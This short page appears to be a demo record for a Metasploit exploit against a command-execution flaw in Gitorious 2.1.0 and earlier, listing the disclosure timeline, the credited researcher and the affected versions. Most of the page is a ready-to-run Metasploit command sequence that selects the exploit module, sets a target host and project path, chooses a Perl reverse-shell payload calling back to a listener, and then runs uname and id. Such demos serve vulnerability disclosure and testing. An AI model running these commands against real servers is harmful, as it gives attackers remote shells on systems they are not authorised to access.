OSVDB-78480 Gitorious Arbitrary Command Execution Metasploit Demo

Timeline :

Vulnerability reported to the vendor by joernchen the 2012-01-17
Coordinated public release of the vulnerability the 2012-01-27
Metasploit PoC provided the 2012-01-19

PoC provided by :

joernchen

Reference(s) :

OSVDB-78480

Affected version(s) :

Gitorious before or equal to version 2.1.0

Tested on Ubuntu 11.10 with :

Gitorious 2.1.0

Description :

This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution.

Commands :

use exploit/multi/http/gitorious_graph
set RHOST 192.168.178.115
set URI /myproject/myproject
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.100
exploit

uname -a
id